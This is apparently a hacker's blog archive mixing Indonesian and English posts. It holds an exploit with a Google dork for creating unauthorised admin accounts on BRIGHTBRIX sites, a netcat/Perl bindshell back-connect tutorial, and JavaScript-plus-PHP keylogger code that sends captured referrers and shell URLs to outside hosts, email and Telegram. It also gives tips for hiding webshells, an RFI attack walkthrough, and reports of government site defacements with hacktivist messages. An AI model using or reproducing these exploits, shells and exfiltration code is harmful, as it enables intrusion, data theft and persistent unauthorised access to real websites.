Articles by "Security"



=====================================================================
Exploit Title : BRIGHTBRIX® Web Producer Add Admin Vulnerability
Author        : Zaenal Arifin
Exploit Date  : September 06, 2018
Software      : https://www.brightbrix.com/
Vendor    : https://www.brightbrix.com/
Version    : -
Home    : www.bandungdigitalsecurity.org
Tested on     : Windows 7/10 64x - BackBox Linux 5.0 64x
Exploit Risk   : Medium
=====================================================================

Proof of Concept :
Search in google browser or another browser and use the dork :
Dashboard for BRIGHTBRIX® Web Producer - Extending the Internet
and us ur brain to develop this dork.

and Use Exploit :
/user_admin/login_page.php?return_url=%2Fxampp%2Flang.php%3Fen

If vuln then you will find a form to create a new account

and fill in the active e-mail, and check your e-mail for activation of the code and creat ur password, if it is then it will go directly to the dashboard page.

Proof : > https://image.ibb.co/jCa2je/Pwnd.png

Demo : https://www.brightbrix.com/user_admin/login_page.php?return_url=%2Fxampp%2Flang.php%3Fen

===========================================
Contact Me  : 
https://www.facebook.com/darkvenom.gov
zaenalarifin.net@gmail.com
===========================================
=====================================================================
Special Thanks to : Familly Team_CC | AnonGhost | MilWorm | TeaMp0is0N | Fallaga Team
=====================================================================


And it happened again The official website of the Afghanistan Military hacked by AnonGhost, was apparently being hacked by hackers. when our party opened a website that addressed http://www.airman.af.mil  the appearance of Black with the Islamic Images and read "US army + Israeli Army = Children Killersand include a message :

This Message Is Addressed To the United States Government :
you have failed as expected.
for long time,we have witnessed your unjust laws.
you have abused human rights, killed thousands of innocents ,
supported Israel to kill innocent Palestinians in Gaza strip.
bombings houses and mosques,arresting and killing innocent people in Iraq & Afghanistan
using media propaganda to justify your lies and your corrupt act... 
now it's our turn to react
because we are the voice of muslims everywhere.
We are AnonGhost, We are Legion, United as ONE, Divided by ZERO.
We do not forgive Injustice.We do not forget Oppression.
US Government
"We are AnonGhost, We are legion, We do not forgive, We do not forget, Expect us."
you have to Expect Us !

It is not clear whether the website administrator who handles the website has known about this cyber attack. Because until now, the deface display can still be found.

Who does not know the name AnonGhost in its time in 2012-2014 the team is a team that shocked the part of the world where this hacker is a jihad cyber hacking tens of thousands of websites in a few days. after a long time not appearing this time AnonGhost returned and hacked the Afghan Military Site.

Until this news has been posted, there has been no response from the website manager, and still save the file named owned.html, we can see the display in the following archive:
http://www.zone-h.org/mirror/id/31589934

or can directly see at the address:
http://www.airman.af.mil/
http://www.pdg.af.mil/index.php

(Zaenal Arifin)

Baru-baru ini situs Biro Hukum Departemen Kementrian Kesehatan Diretas, pada tanggal 23 Agustus 2018 saat diakses website Biro Hukum Kementrian Kesehatan yang beralamat pada http://hukor.kemkes.go.id/ tampilan berubah menjadi Background Merah Putih dan terpampang sebuah Gambar Meme Para Narapidana Korupsi dan Bertuliskan "SEBANGSAT APAPUN KALIAN JANGAN LUPA TETAP TERSENYUM KARENA SENYUM ADALAH IBADAH" pada gambar tersebut berikut sekilas tampilan nya :


dan berisi pesan yang mengkritik pemerintah berikut Pesan yang disampaikan oleh hacker tersebut :


"Hacked by MrMoonz ft KaizeN"

Di puncak pemimpin yang bebas korupsi, disitulah masa depan negri.
Jangan Benci Negara, Bencilah Pemerintahnya
Karena, Rakyat adalah Kekuatan.
Jangan Benci Hacker, Bencilah Kodenya
Karena, Tidak Ada Sistem yang Aman

Greatz
Res7ock Crew | Ghost Sec-Team | Sanjungan Jiwa

Indonesian Hacker Rulez

dan mencantumkan bebrapa Codenama lain nya Berikut isi kontent yang terpampang pada halaman depan situs biro hukum kementrian kesehatan, tampaknya motif dari serangan ini memiliki arahan terhadap pemerintah yang korup.

Situs Hukor Kementrian Kesehatan ini masih berfungsi seperti semestinya dimana menampilkan informasi-informasi penting.

berikut daftar website yang diretas :

http://hukor.depkes.go.id/
http://hukor.kemkes.go.id/

Setelah diluncurkan nya berita ini belum ada tanggapan serius dari pengelola website. seharusnya ini bisa menjadi perhatian penting bagi pengelola karena ini merupakan hal yang sangat fatal.

(Zaenal Arifin)


Baru baru ini Subdomain dari Situs Komisi Pemberantasan Korupsi alias KPK lebih tepatnya pada Subdomain e-LHKPN KPK Diretas , Peretas tidak merusak tampilan halaman depan namun merusak index dari direktori penyimpanan gambar yaitu pada bagian /images yang beralamat pada : https://elhkpn.kpk.go.id/images/ , Saat dikunjungi Tampilan berubah menjadi Latar putih dan berisikan Sebuah Kata-kata dan sebuah gambar Kartun dimana tulisan tersebut bertuliskan :

"Hacked by MrMoonz" 
[ Indonesian Hacker Rulez ] 

Laughing at your security! Security is just an illusion! 

Copyrights © Rabbit Security Team 2018

Entah apa motif dari kasus peretasan ini Belum jelas apakah administrator website yang menangani website tersebut telah mengetahui kejadian serangan cyber ini. Karena hingga sekarang, tampilan deface tersebut masih dapat ditemui.

Sampai dirunkan nya berita ini belum ada tanggapan dari pihak pengelola website, dan masih menyimpan file yang bernama owned.html , kita bisa melihat tampilan nya di archive berikut :
https://defacer.id/archive/mirror/2586126

atau bisa langsung melihat di alamat :

https://elhkpn.kpk.go.id/images/


(Zaenal Arifin)



Dan Terjadi lagi Website resmi Pasukan Pengamanan Presiden alias Paspampres tampaknya sedang diusili hacker. ketika pihak kami membuka sebuah file yang bernama owned.html tampak tampilan Hitam dengan Logo Devilz Street dan bertuliskan "Owned by Typical Idiot Security"

Belum jelas apakah administrator website Paspampres yang menangani website tersebut telah mengetahui kejadian serangan cyber ini. Karena hingga sekarang, tampilan deface tersebut masih dapat ditemui.

Belum diketahui pula siapakah hacker di balik serangan model deface ini. Domain mil.id sendiri sengaja dibuat PANDI (Pengelola Nama Domain Internet Indonesia) untuk kebutuhan militer.

Kejadian ini pernah terjadi pada Sabtu, 02 Mei 2015 dan kali ini pada tanggal 21 Agustus 2018 Website Resmi Paspampres kembali menjadi target para hacker.

Sampai dirunkan nya berita ini belum ada tanggapan dari pihak pengelola website, dan masih menyimpan file yang bernama owned.html , kita bisa melihat tampilan nya di archive berikut :

http://www.zone-h.org/mirror/id/31589934

atau bisa langsung melihat di alamat :

https://www.paspampres.mil.id/owned.html


(Zaenal Arifin)



Oke Kali ini Kita Update kembali , kali ini saya akan share ASP Shell Backdoor Shell ini beda dengan shell biasanya karena shell ini khusus hanya untuk Windows Server 2012  tepatnya pada Server IIS-8. Terkadang kita menemukan sebuah website dan ketika kita upload sebuah file ketika upload sukses namun ketika dilihat 404 Not Found dan tampilan nya merupakan 404 Not Found dari Server IIS-8 , yaps karena website yang menggunakan server IIS tidak bisa mengupload ext file sembarangan , jarang yang meng enablekan untuk ext php karena rentan dari attack , maka dari itu shell ini diperlukan karena shell ini di design khusus untuk Windows Server.

Apa sih bedanya Shell ASP sama PHP ? yok sedikit bahasan biar ga kaku :v

ASP merupakan kependekan dari Active Server Pages, suatu jenis program yang bekerja dalam Microsoft (Windows) melalui IIS (Internet Information Server). ASP memerlukan server Microsoft untuk menjalankan website. Sedangkan program PHP atau Hypertext Preprocessor berjalan di server Linux atau Unix. PHP yang lebih baru bisa berjalan di server NT.


Program PHP juga bisa berjalan di Windows, Solaris, Unix dan Linux sedangkan ASP hanya bisa berjalan di server dengan platform Windows. Baru-baru ini saja, ASP bisa berjalan pada platform Linux yang hanya ada bila sudah terinstall ASP-Apache di servernya.

PHP sangatlah fleksibel ketika dikoneksikan dengan database. PHP bisa terkoneksi dengan beberapa database dimana yang sebagian besar digunakan adalah MySQL. Harap dicatat bahwa MySQL tidak akan membebani Anda sesen rupiah pun. Tapi bila Anda ingin memakai ASP, Anda perlu untuk membeli MS-SQL, produknya Microsoft.

Kecepatan me-load adalah faktor besar dalam memelihara website. Jika Anda sangat selektif soal kecepatan, Anda mungkin lebih membutuhkan PHP. Pada dasarnya kode PHP berjalan lebih cepat daripada ASP karena berjalan di space-nya sendiri sedangkan ASP menggunakan sebuah tambahan server dan menggunakan arsitektur berbasis COM.

Dalam bekerja dengan PHP, kebanyakan tools terasosiasi dengan program yang kebanyakan berupa open source software, jadi Anda tidak perlu membayar untuk mendapatkan tool tersebut. Tidak seperti ASP yang mungkin mengharuskan kita untuk membeli tool tambahan untuk bekerja dengan program ini.

Kesimpulannya, baik PHP dan ASP mempunyai keuntungan dan kerugian. Pada dasarnya semua bergantung pada bagian pengembangan website mana yang akan Anda pilih. Apakah Anda mencemaskan biaya dari pembuatan website Anda? Apakah anda ingin menggunakan bahasa pemrograman yang familiar dengan Anda? Apakah Anda menginginkan website yang lebih stabil dan cepat? Pemilihan antara ASP dan PHP pada dasarnya tergantung pada preferensi Anda sendiri. Sebaiknya Anda berunding dengan programer atau webmaster lainnya dan cari sebanyak mungkin informasi mengenai kode pemrograman mana yang paling pas dengan website Anda.
mungkin cukup sekian lah asupan tentang asp nya :v

oke langsung saja berikut merupakan tampilan dari shell nya :




Source : 
https://pastebin.com/iuJhCm8Y

Semoga Bermanfaat

(Zaenal Arifin)

Okay this time I will give a simple tutorial on how to backconnect using bindshell . many problems that are often encountered when going to rooting the server are in step 1, namely backconnect, there may be many ways to do backconnect but this time I will give a tutorial by using bindshell


Material :
Bindshell script  : Here
Shell backdoor / webconsole shell : Here
netcat [if user windows] : Here 

Proof of Concept :
Step 1 :
Upload BindShell file, if web server not acceptable to upload shell using browser uploader u can try using command

Command Upload : 
Using Curl : curl -o bind.pl [scriptlink]
Using Wget : wget [scriptlink] -o bind.pl

Step 2 :
if u done upload the file go to cmd/Terminal [Netcat Folder]

Using Command :
Windows User : cd C:/[PathNetcat]/
Linux User : Direct order

Step 3 :
Command nc -vv [ServerIP] [Port]
if done not enter first
and go to shell backdoor/webconsole

Step 4 :
in web console u can command
Perl bind.pl 1337
and Press Enter

Notes : bind.pl => Name file bindshell , 1337 => Port

Step 5 :
Go back in cmd/Terminal
and Press Enter

and see what happens
Backconnect Success :p

PoC Video :



Notes : This trick does not run 100% on all servers and the important thing that must be considered is PERL, whether the web server is ON or OFF

(Zaenal Arifin)


Repositori perangkat lunak Linux Arch bernama Arch User Repository (AUR) telah terinfeksi oleh malware. Sebanyak tiga paket Linux Arch yang tersedia di repositori telah dilaporkan mengandung malware.

Repositori memiliki paket yang dikirim oleh pengguna, dan begitulah cara malware itu dirilis di repositori. Seorang pengguna bernama "xeactor" mengambil alih paket ‘orphaned’ dengan nama "acroread" yang berfungsi sebagai penampil PDF dan menambahkan kode jahat.

Seperti yang dilakukan Git, "Xeactor" menambahkan kode yang akan mengunduh skrip yang nantinya akan menginstal perangkat lunak yang ikut campur dengan "sistemd" dan mengkonfigurasikannya kembali. Skrip ini akan berjalan setiap 360 detik.

Malware yang dimaksudkan untuk mengumpulkan data dari sistem yang terinfeksi termasuk tanggal, waktu, ID mesin, rincian paket pengelola, informasi CPU dan output dari perintah "uname-a" dan "systemctl list-units". Data yang dikumpulkan akan diposting dalam file Pastebin baru.

Dua paket lain juga terinfeksi dengan cara yang sama. Meskipun tidak menimbulkan ancaman serius terhadap komputer yang terinfeksi, diperkirakan bahwa "xeactor" dapat meluncurkan malware lain karena mekanisme pembaruan diri tidak disertakan.

Setelah menemukan malware, perubahan yang dilakukan dalam paket itu dibatalkan, dan tim AUR telah menangguhkan "xeactor."

Namun, serangan malware ini menimbulkan kekhawatiran serius atas kredibilitas repositori paket yang dikirim pengguna. Awal tahun ini, Tim Toko Ubuntu juga menemukan penambang cryptocurrency yang tersembunyi dalam paket Ubuntu.


Di masa lalu, para peneliti keamanan telah menemukan kasus di mana hacker yang terkenal mampu menggunakan data gambar EXIF ​​untuk menyembunyikan kode berbahaya. Teknik ini masih banyak digunakan untuk menginfeksi pengguna web dengan malware.

Selangkah lebih maju, telah ditemukan bahwa peretas telah menemukan cara untuk berbagi malware melalui server Google tepercaya dan tepercaya seperti milik googleusercontent. Bertentangan dengan malware yang disimpan dalam file teks, jauh lebih sulit untuk melihat muatan berbahaya dalam gambar. Selain itu, semakin sulit melaporkan malware yang ditemukan di googleusercontent.com ke Google.

Bagi mereka yang tidak tahu, googleusercontent adalah domain Google untuk melayani konten yang disediakan pengguna tanpa memengaruhi keamanan laman Google sendiri.

Sesuai laporan Sucuri, kode berikut terlihat dalam skrip yang mengekstrak kode keamanan PayPal:



Skrip membaca data EXIF ​​dari gambar googleusercontent, yang mungkin diunggah oleh seseorang di akun Google+ atau Blogger. Ketika bagian UserComment dari data EXIF-nya didekodekan, ternyata itu adalah skrip yang memiliki kemampuan untuk mengunggah file web shell dan arbitrary.

Ini menggaris bawahi ancaman yang lebih besar karena tidak ada cara untuk mendeteksi malware sampai seseorang memeriksa meta data gambar dan menguraikannya. Bahkan setelah menemukan malware, seseorang tidak dapat mengetahui sumber sebenarnya dari gambar tersebut.



Tidak ada keraguan bahwa Linux dan Mac adalah pilihan sistem operasi yang lebih aman daripada Microsoft Windows. Tetapi ini tidak berarti bahwa peretas tidak menemukan cara untuk menginfeksi komputer yang menjalankan sistem operasi ini - di masa lalu, kami menemukan botnet Mirai masif yang mengontrol perangkat jaringan yang menjalankan Linux.

Pembuat Mirai menggunakan bahasa pemrograman Golang (juga disebut Go) untuk menulis kode malware. Baru-baru ini, para peneliti keamanan di JPCERT (Via: TechRepublic) telah menemukan malware lain yang ditulis di Go; itu bahkan fitur kemampuan lintas-platform dan datang dalam dua versi.

Namanya WellMess, malware ini mempengaruhi sistem operasi Linux dan Windows. Sementara fungsi dasar dari kedua versi malware tetap sama, ada beberapa perbedaan kecil.

Sama seperti malware lainnya, WellMess berkomunikasi dengan perintah & kontrol (C & C) pusatnya dan mengunduh perintah untuk tindakan lebih lanjut. Perintah dapat diberikan dari server C & C untuk mengunggah / mengunduh file dan mengeksekusi perintah shell sewenang-wenang. Versi Windows lebih lanjut memiliki kemampuan untuk menjalankan skrip PowerShell.

Perintah dikirim ke perangkat yang terinfeksi dalam bentuk permintaan HTTP Post terenkode RSA; data header cookie dienkripsi RC6. Bukan itu saja. WellMess juga memiliki versi yang dikembangkan di .Net Framework. Data cookie dalam versi .Net sama dengan versi Go.

Seperti JPCERT, kejadian-kejadian serangan telah ditemukan di organisasi Jepang, dan mereka dapat terus berlanjut di masa depan juga.


Oke sebelumnya saya sudah menjelaskan tentang Keylogger di Java Script kali ini saya akan memberikan tutorial cara memasangnya.


Jika belum tahu kalian bisa Baca disini : Java Script Keylogger

langsung saja pertama kita buat file jquery nya terlebih dahulu
dengan code :
var r=document.referrer;if(r != ""){var x = new XMLHttpRequest();x.open("GET", "https://labs.suicide-db.com/shell.php?ref=" + r, true);xhttp.send();}
sedikit penjelasan :
https://labs.suicide-db.com/shell.php : ini merupakan web kalian yang berisikan shell yang berisi keylogger.


jika sudah save dengan format .js jika sudah kalian bisa membuat script ini :
<script type="text/javascript" src="https://labs.suicide-db.com/jquery.js"></script>

Letakan script ini didalam meta <head> </head> Contoh :
<head><script type="text/javascript" src="https://labs.suicide-db.com/jquery.js"></script></head>

jika sudah kita ke tahap selanjutnya kita kembali ke step atas di bagian pada link https://labs.suicide-db.com/shell.php nah sekarang kita akan membuat file shell.php ini

pertama kalian masuk filemanager website kalian dan buat sebuah file shell.php atau bebas disini saya membuat file shell.php jika sudah masukan script berikut :
<?php@date_default_timezone_set('Asia/Jakarta');error_reporting(0);error_log(0); if(isset($_GET['ref'])){$url = $_GET['ref'];if(!empty($url)){$sb = "[SHELL][Xenzia Worm][".date('D, d M Y H:i:s')."]";$headers = "From: PROLOGGER <KeyLogger@xenzia.worm>\r\n";$msg = "+------------------------------------------+\n# SHELL LOG ".date('D,d m Y H:i:s')."\n+------------------------------------------+\n# URL :: ".$url."\n+------------------------------------------+\n# JavCode @ 2018 | Powered by : shutdown57\n+------------------------------------------+\n";@mail("postmaster@zaenalarifin.net",$sb,$msg,$headers);@file_get_contents('https://api.telegram.org/bot516764791:AAEEnO8F…/sendMessage…);$fp = fopen('sl/JavCode-'.date('dmY').'.txt','a');fwrite($fp,$msg);fclose($fp);}exit;}else{exit('?');}
Oke hal yang harus diperhatikan :
@mail("postmaster@zaenalarifin.net",$sb,$msg,$headers); (log dari shell ini akan masuk ke alamat email kalian)

@file_get_contents('https://api.telegram.org/bot516764791:AAEEnO8F…/sendMessage…);

(log dari shell akan masuk ke alamat pesan telegram kalian)

jika sudah save file nya dan keylogger sudah terbuat
Oke mudah bukan , mungkin cukup sekian semoga bermanfaat

Jika masih tidak mengerti kalian bisa hubungi saya di Menu Contact Us

(Zaenal Arifin)


Oke Kembali lagi bersama saya kali ini saya akan share tutorial membuat/membongkar key logger di Java Script tepatnya di Jquery buatan Shutdown57 dari JavaCode.


Pada umumnya keylogger dibuat dalam bentuk code PHP namun teknik tersebut sudah diketahui banyak orang dan memunculkan sebuah inspirasi baru dari Shutdown57 untuk tetap menjalankan Keylogger tanpa diketahui yaitu menggunakan ref dari Jquery
Kok bisa dari script jquery ?

yaps disini kita memfungsikan request ajax yang ambil referrer dari shell.
Berikut Code Singkat Jquery nya :


var xhttp = new XMLHttpRequest();xhttp.open("GET", "http://x.linuxcode.org/_.php?ref=" + document.referrer, true);xhttp.send();

Yaps disini kita bisa melihat request dari referrer menuju sebuah link yaitu http://x.linuxcode.org/_.php

nah disinilah letak keylogger nya , dalam intinya keylogger ini sama menggunakan code php namun disini author membuat agar tidak diketahui orang melainkan melalui request referrer dari link lain menggunakan fungsi request dari jquery yang akan diarahkan menuju http:/x.linuxcode.org/_.php agar tidak dapat diketahui orang dan orang akan mengira file jquery ini merupakan fungsi yang seperti biasanya dalam arti (bukan sebuah file berbahaya/hanya untuk memfungsikan style dalam web itu sendiri)

Oke tahap selanjut nya , apa isi dari http:/x.linuxcode.org/_.php ?

yaps jika kita buka maka link tersebut blank atau tidak ada isinya mengapa ? karena ini hanya berisikan code php keylogger tanpa ulasan sedikitpun , oke lalu isi code nya apa ?

Isi dalam file _.php itu code php keylogger

berikut Code nya seperti ini :

<?php@date_default_timezone_set('Asia/Jakarta');error_reporting(0);error_log(0);
if(isset($_GET['ref'])){$url = $_GET['ref'];if(!empty($url)){$sb = "[SHELL][shutdown57][".date('D, d M Y H:i:s')."]";$headers = "From: PROLOGGER <LoggerShell@shutdown57.today>\r\n";$msg = "+------------------------------------------+\n# SHELL LOG ".date('D,d m Y H:i:s')."\n+------------------------------------------+\n# URL :: ".$url."\n+------------------------------------------+\n# JavCode @ 2018 | Powered by : shutdown57\n+------------------------------------------+\n";@mail("indonesianpeople.shutdown57@gmail.com",$sb,$msg,$headers);@file_get_contents('https://api.telegram.org/bot516764791:AAEEnO8F…/sendMessage…);$fp = fopen('sl/JavCode-'.date('dmY').'.txt','a');fwrite($fp,$msg);fclose($fp);}exit;}else{exit('?');}
Yaps itu merupakan isi dari file _.php didalam script keylogger diatas memakai 3 fungsi logger yang akan dikirimkan ke :
  1. Kedalam Server
  2. Kedalam Email @mail()
  3. Kedalam Telegram dengan menggunakan Api Telegram message

Jadi keylogger disini mengmbil dari referrer shell yg berada di http:/x.linuxcode.org/_.php  
terus bagaimana jika shell menggunakan Password ?

Kalian bisa pasang :


echo "<meta http-equiv=refresh content=0;url=?login=".$this->password.">";

untuk ambil variabel password nya

Untuk Cara pemasangan Keylogger Kalian Bisa Baca disini :
Cara Memasang Kylogger di Java Script 

Oke mungkin cukup sekian dan terimakasih semoga bermanfaat

Selamat Beraktifitas kembali

(Zaenal Arifin)


Oke gengs ketemu lagi sama saya Zaenal yang gans tiada tara , kali ini saya akan share trik agar shell backdoor kalian tidak terkena dorking orang


Oke jadi gini ,Jadi kesimpulan nya sangat simple ..


Pada dasarnya ketika orang dorking shell menggunakan google dork yang cukup relevan


Ex : inurl:/wp-content/plugins/name/shell.php


yaps /shell.php ini yang sangat fatal karena di web ada meta tag , otomatis shell/seluruh file yg sudah masuk di web akan terindex di google


otomatis masuk cache google

Example : 




jadi ketika kita membuat shell di dir yg kita buat


Ex : /Haxor dan upload file index.php << index.php berisikan source code shell kalian


jadi ketika kita buka dir nya bisa tanpa extentsi .php karena


Kemungkinan besar tidak akan diketahui orang lain walaupun terindex google karena kebanyakan jika nama shell kalian aneh" itu jadi pertimbangan para pencuri shell mungkin mereka fikir itu peluang besar untuk mencuri


dan jangan kalian membuat nama dir yg identik dengan Hacker / Sejenisnya kalian bisa membuat dir dengan nama default dir cms , plugins atau  sejenisnya 


Ex : /javascript - /css - /filemanager - /tinymce


dan jika orang lain membuka dir /javascript otomatis mereka berfikir bahwa ini bukan merupakan sebuah shell


dan hal paling penting set shell background dengan menu tampilan forbidden biar lebih meyakinkan karena bisa jadi mereka mengira bahwa dir tersebut di setting forbidden oleh admin dari web tersebut


mungkin trik shell forbidden sudah diketahui tetapi para anak" gblk cukup pintar dan melihat file name nya tidak langsung di close 

dan nama shell ini juga yg menjadi perhatian karena si anak" gblk pinter mana mungkin admin membuat nama file yg aneh contoh :


Ex : /wp-content/plugins/sayang.php


Nah mungkin begitu lah teknik nya

dan jangan lupa


Jangan pernah kalian menggunakan <title>Shell bekdor apalah</title> cukup gunakan title Forbidden biar orang lain yakin , dikarenakan jika title shell kalian  


Ex : <title>Mini Shell</title>


Otomatis Anak" kntl lebih mudah untuk mencari karena ketika mereka membaca nama shell sudah pasti niat gblk nya dan mencoba untuk menuju link yg muncul dan efek yg terjadi shell kalian akan hilang begitu saja


Berikut Sebuah contoh shell yg terkena dorking dan pasti di klik oleh orang lain  :




Semoga bermanfaat


(Zaenal Arifin)

Remote File Inclusion (RFI)



Hello Guys! In this article we will learn how to exploit a RFI vulnerability. I hope you have read my previous article on Local File Inclusion, if you haven’t please go and read  that first.



Remote File Inclusion (RFI)

As the name states if the attacker can include a remote file to the victim web app, it is called a Remote File Inclusion Vulnerability (RFI). Take a look at this piece of code:






As you can see in the first line, it extracts the file parameter value from the HTTP request made by the user, while the second line utilities this value to set the file name. If the input is not being sanitized properly it can be used to include malicious file from a remote server. Here’s a vulnerable JSP code,





Again, If the input is not sanitized properly it can be used to include a malicious file from a remote server. RFI is not a common vulnerability at all but it is very dangerous when exploited. Now you must be wondering how to exploit this vulnerability. Hold on, I will demonstrate it with a real life example. We have a URL here,





Lets break things down



  1. www.victim.com is the target website
  2. file.php is a webpage with the parameter view=
  3. For example if the user wants to view a document related to animals, the webpage file.php loads it via the view= parameter.

Take a close look at view= , if it was including local files like view=/files/animals.php we would have test for Local File Inclusion. But as we can see its including files from docs.example.com which is a different website, it means it loads files from other website which means it may include any malicious file too. Enough theory! So here’s the vulnerable parameter 


Now I will try to load an image by submitting its URL like this





See? How easy is that? With a webshell you can take over their website or even the whole server.

Also Read : File Inclusion Attack

Zaenal Arifin

{facebook#https://www.facebook.com/darkvenom.gov} {twitter#https://twitter.com/steviefar07} {google-plus#https://plus.google.com/u/0/117673850650242989379} {youtube#https://www.youtube.com/c/KaizenJavaHaxor}

Contact Form

Name

Email *

Message *

Powered by Blogger.
Javascript DisablePlease Enable Javascript To See All Widget